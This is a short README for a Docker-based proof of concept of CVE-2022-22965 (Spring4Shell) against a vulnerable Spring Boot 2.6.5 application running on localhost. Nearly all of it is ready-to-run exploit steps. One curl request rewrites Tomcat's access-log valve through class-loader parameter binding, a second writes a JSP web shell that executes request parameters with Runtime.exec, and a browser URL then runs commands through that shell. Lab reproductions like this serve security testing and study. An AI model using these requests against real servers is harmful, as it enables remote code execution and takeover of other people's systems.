Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5
- Run
docker compose up --buildto build and start the vulnerable application. - Run
curl -H "Accept: text/html;" "http://localhost:8080/demo/sample?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="to changes Tomcat config valve. - Run
curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x"to create the web shell. - Open your browser and go to http://localhost:8080/shell.jsp?1337=id to start executing commands.